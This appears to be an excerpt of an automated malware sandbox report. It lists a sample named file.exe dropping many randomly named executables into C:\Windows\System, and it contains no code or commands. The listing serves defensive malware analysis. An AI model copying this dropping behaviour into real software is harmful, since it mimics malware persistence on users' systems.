Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IEswIyo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IjDqKMU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iEDLgeS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\qmcblFN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZCyEzte.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ztQluWW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vixYnHG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PPOtBBY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZohDODH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tyXEsEa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FUwHkXo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AbenojY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mlhNNPN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pMaKiZu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BMxbfij.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\OVdNTki.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NVxCwjX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FHjAcHx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\glgdLrR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jtnQpnb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pbwrbNh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HbWODob.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WVsCsMZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FgBtrMU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TBNKhIN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TQUlNhY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\izzcVgF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mbSqRHL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lyMiIxb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\veVfAiw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HVhldsH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZPBkGsL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZXNyiNu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sGYPztO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eIXgzbs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FGSooXz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\yzVBTwc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\chBMsUn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EDndQMl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uxMRJKa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\OyxgWny.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fhxlOMT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bxBimDh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mPNsbfH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WZkiNdG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nkFLDPI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\yolnOnG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SUucMiy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\aFpkhGM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AOSuUmd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DNhkeWm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\svRRwoZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nKUJunm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HuKkgJY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mBbgLGb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DCqXTox.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PbUiiSM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VsobEcA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CVYvaQs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KeLPRxW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tWOQBIk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mshbGSl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ccbrmxM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sJZigTD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WvowvSL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BnLcQMe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wkazDeV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mdMaqgD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rTpsbWr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cBoEBlV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NqPZXyD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dbgHMyC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cyvijMt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ykZgpGK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UqXZtcb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YIjJOqk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JqFVNbS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wNVvJxX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\oCLXTVT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dPvMBBP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WCbcoxD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CoTJSDT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wnWUbPS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZFvVqBc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VjXLpYb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lVudyTV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WdIXuil.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DBfMBcY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iYYYydA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XbARtow.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vKoIcLB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xAngvPh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wPprRzW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xyokMuX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ckHJCFb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\imwRXsl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\kPkYoOt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FlmGZHf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pnGqAlS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HHsWpNX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LFQLRaY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ghXRScL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VHwkuIa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HjdahEF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pMMnfcQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\aFbtfKK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hzIYZSD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QqSzknx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LTWTGcY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LLELsGo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eIthybV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LCScugy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eaXsKmO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UQPgIol.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NrRaZIJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DTVvNoy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lBrohsB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hyzwXgh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sdTevgk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\skgGGJN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nJZyUBH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ucDGEkw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AXEGSHs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JdmbeCb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hMvDOJd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nWSykjl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pGmaKvE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EENzfBP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QrBMIBp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NDapyRM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CGpcHNw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pBTelAj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\GoSpvOG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bsgTRXG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tJmWuwF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jmSIZKC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\OgBLDNx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\yuTigyc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dMXkTWG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cVpmxhg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mByREeI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rtBLYbw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EzVUaNc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EZbURBQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\geBTNDq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TVNHEGY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PjowoJp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bzSbRdi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FoekgWP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sDLqeeh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bFsdWPU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WvkREuJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\aBqatWR.exe	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\kYjPKaN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RcAqfwv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PaGFrFU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\OpMgkKg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MydOwjq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HKdVaSy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FgiIXgf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NyhRMmW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rgBmwKj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QdDnaqt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BpqsHCR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gKbbPbF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\kFAVWnk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\roZGxps.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SAfbgcC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XWzPvUm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wkIkkhX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UQkDiSP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AQSffhY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uRBSbtU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YYCxOQh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rYIlnZs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XZxtJFw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dCnJkoQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BwBweqn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pzbELEW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\qdErmhf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rQJmlSe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\qQyXqOp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fIqTNJz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WlVmTit.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xAzCYwU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eXUokzg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IpqVIyY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\oUGjnOU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sabRErB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BwjWQVv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\snZBbmy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eVVPPqR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KEULPTl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mgbtojr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UmvuxvA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\Uvtpjkd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NLJeLdM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ORmCcsC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xneUGSK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KVgdAzq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jYFqRXp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XAgYYqB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WTLAzgJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\whRtinB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wHnuprt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mXElbHo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VgNRTsd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DbVBXPi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uaJCfvY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jAqlPqL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JKpmIVS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wibjUVa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\oxCQuSo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\GmNUXAr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IofoOIp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CWLRJYu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HnTfvAZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\delwiax.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EkcZQPq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fylerHE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VFkciqc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fpHmIIc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vUKZkjM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\yXkrKHV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VwIvzCk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VdwdSnC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fyffsXe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TscCBWf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iHSYLud.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wJZTVhW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gCZFmUf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JUxucoT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YFzrUDj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bpCJdvZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VGaSwYr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UlGsoAn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uSdaSKW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YHgRCCe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YnfMwga.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UExJWUr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PLFTiIe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EMuPVcI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xIpouRJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wpjxcMS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LOvnxUx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wCJLXKb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sXBohAC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ABievJY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PrFZfUv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MKAkyBP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mKdsHiQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BNgUfBr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WLWcTVM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ukkpYme.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hEUEsIC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mWAGJFM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cLSDHvv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\Csmwgyb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uHZGZjz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jzfTIlb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sOpjlAo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fWWVlTg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PZXDYlu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DTREvJC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HeXCeXe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BtXtEfY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sOGcIfs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SNcreuq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tRGqWXW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iIwdGAS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RlLCkUy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\caYiRYR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\otCfESI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MLxwqET.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xNhRSWh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZTSJHKb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YUQTINM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fEOJwwW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ppfNNTX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PABSWXd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MCvhdFU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fYMwhpS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ASKjfZy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PUqZmPS.exe	Jump to dropped file
